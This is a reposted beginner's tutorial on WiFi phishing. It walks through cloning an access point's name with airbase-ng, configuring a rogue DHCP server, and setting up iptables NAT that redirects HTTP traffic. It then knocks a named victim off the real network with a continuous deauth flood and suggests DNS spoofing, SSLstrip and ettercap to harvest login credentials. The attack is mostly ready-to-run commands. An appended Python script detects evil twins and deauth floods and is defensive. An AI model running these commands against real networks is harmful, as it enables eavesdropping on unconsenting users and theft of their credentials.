Brief introduction
The experiment first builds a test environment, then creates a fake wireless access point, bridges the network connection to the fake access point, and forces the user to connect to it.
Prepare beforehand
1. Wireless card: the wireless card is used for sniffing and injecting packets.
2. Backtrack or Kali Linux: the attack platform.
3. Wireless network: make sure it is the one the user is actually using and that you control this wireless access point.
4. A target machine: this can be either your physical machine or a virtual machine. In this experiment a Windows 7 virtual machine was used.
Start the experiment: create a rogue access point
First step:
Start the virtual machine and choose Kali Linux. Click "Edit virtual machine settings", go to the "Network Adapter" option and select "Bridged" under network connection:
Step Two:
Open Kali and log in with the root account.
Step Three:
Connect your laptop's wireless card. Make sure that the wireless card entry under the "Removable Devices" option has a blue check mark in front of it. If not, select the wireless card to disconnect it from the Windows host and attach it to the Kali Linux virtual machine, as shown here:
Fourth Step:
Open the terminal and enter the following command to check the IP address and gateway.
In this example, the gateway is 192.168.0.1.
Fifth Step:
First, use the following command to list all NICs:
You can see a network card named wlan5; this is the one we will use.
Sixth step:
Check which wireless APs are available near the user with the following command:
airodump-ng wlan5
This command starts capturing packets and lists the access points near the user, where BSSID is the MAC address of the wireless AP and CH is the channel (frequency). Note the value of the PWR column: the closer the router is, the smaller the value.
Seventh Step:
Note the BSSID and channel of the AP. Also note the MAC address of the target device.
In this example, the BSSID is 5e:f9:6a:29:28:18 and the channel is 2. The MAC address of the target machine is 68:5d:43:7d:f7:e9.
Eighth Step:
We have to set up a fake DHCP server to serve the fake AP. You can install one by executing the following command in Kali:
apt-get install isc-dhcp-server
Once installed, modify the DHCP configuration file /etc/dhcpd.conf as follows:
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
    option routers 192.168.1.1;
    option subnet-mask 255.255.255.0;
    option domain-name "Epson_Printer";
    option domain-name-servers 192.168.1.1;
    range 192.168.1.2 192.168.1.40;
}
Save and close the configuration file.
Repeat the above for the /etc/dhcpd/dhcpd.conf file.
Ninth step:
Open a terminal and execute the following command to create an AP whose ESSID resembles the one the victim uses; in this example we use "Epson_Printer".
airbase-ng -e Epson_Printer -c 2 wlan5
-e is the ESSID of the AP access point
-c is the channel of the wireless network
wlan5 is the NIC name
Now the new AP named "Epson_Printer" is created.
Tenth step:
Now open a new terminal and start monitoring this phishing AP by executing the following command:
airodump-ng --bssid 00:C0:CA:70:8F:25 -c 2 wlan5
11th Step:
Check the output window from the fifth step; the new AP should be visible:
12th Step:
Now we have to connect this fake wireless AP to the network. Open a terminal and enter the following commands in turn:
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1   # 192.168.0.1 is the gateway found in the fourth step
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
13th Step:
We can wait for someone to connect to the fake wireless AP, or we can force our target to reconnect to it with a de-authentication attack, so that we can capture its packets.
We can do this with the following command:
aireplay-ng --deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5
-a 5e:f9:6a:29:28:18 is the MAC address of the wireless AP
--deauth 0 sends de-authentication packets (0 means keep sending them)
-c is the MAC address of the target machine
wlan5 is the NIC
As can be seen below, the wireless network card is sending de-authentication packets to the target wireless AP. The target machine is disconnected from the "Epson_Printer" access point and starts trying to reconnect:
14th Step:
Because deauth packets are sent continuously, the client cannot stay connected to the original wireless AP, so it starts trying the strongest other wireless AP it can see. Our fake AP has a strong signal, so the client connects to it:
15th Step:
Look at the airodump-ng command window; the connected devices are listed in the terminal:
Now the victim's device is connected to our fake wireless AP. From here an attacker can use various techniques, such as DNS spoofing to lure users to a fake website and collect their login credentials, or SSLstrip and ettercap for man-in-the-middle attacks.
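As an added defensive counterpart (not part of the original article), the following Python script shows how a wireless monitor would spot the two signatures of the setup described above: one ESSID advertised by two BSSIDs (the evil twin) and a burst of de-authentication frames aimed at one client. The BSSID, client MAC and ESSID values are the article's own; the frame records, the 10 s window and the threshold of 5 frames are constructed assumptions.

```python
"""Evil-twin and deauth-flood detector over airodump-ng style observations.
Added example; the sample data below is constructed, not captured."""
from collections import defaultdict

# Constructed beacons seen by a monitoring card: (BSSID, ESSID, channel)
BEACONS = [
    ("5e:f9:6a:29:28:18", "Epson_Printer", 2),   # legitimate AP from the article
    ("5e:f9:6a:29:28:18", "Epson_Printer", 2),
    ("00:c0:ca:70:8f:25", "Epson_Printer", 2),   # airbase-ng twin from the article
    ("a4:2b:8c:11:22:33", "CoffeeShop", 6),      # unrelated AP (constructed)
]

# Constructed management frames: (timestamp_s, subtype, source, destination).
# aireplay-ng spoofs the AP's MAC as source, so the flood appears to come from the AP.
FRAMES = [(t, "deauth", "5e:f9:6a:29:28:18", "68:5d:43:7d:f7:e9") for t in range(10)] + [
    (3, "deauth", "a4:2b:8c:11:22:33", "ff:ff:ff:ff:ff:ff"),  # lone broadcast deauth, benign
    (5, "data", "68:5d:43:7d:f7:e9", "5e:f9:6a:29:28:18"),
]


def find_evil_twins(beacons):
    """Return {essid: sorted BSSIDs} for every ESSID advertised by more than one BSSID."""
    bssids = defaultdict(set)
    for bssid, essid, _channel in beacons:
        bssids[essid].add(bssid.lower())
    return {essid: sorted(b) for essid, b in bssids.items() if len(b) > 1}


def find_deauth_floods(frames, window_s=10, threshold=5):
    """Return {(src, dst): peak count} for source/destination pairs whose deauth
    frames reach `threshold` within any sliding window of `window_s` seconds."""
    times = defaultdict(list)
    for t, subtype, src, dst in frames:
        if subtype == "deauth":
            times[(src.lower(), dst.lower())].append(t)
    floods = {}
    for pair, ts in times.items():
        ts.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(ts):
            while t - ts[lo] >= window_s:   # slide the window start forward
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            floods[pair] = peak
    return floods


if __name__ == "__main__":
    print("evil twins:", find_evil_twins(BEACONS))
    print("deauth floods:", find_deauth_floods(FRAMES))
```

A real deployment would feed these functions from a monitor-mode capture (for example the CSV that airodump-ng writes with -w) rather than from the constructed lists.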
Finally: this is fairly basic, as you can see. Go easy on me (づ ̄3 ̄)づ╭~
* Reference source: resources.infosecinstitute.com; compiled by FreeBuf editor Edison Chen. Please credit FreeBuf (freebuf.com) when reproducing.
Tech share: a beginner's guide to WiFi phishing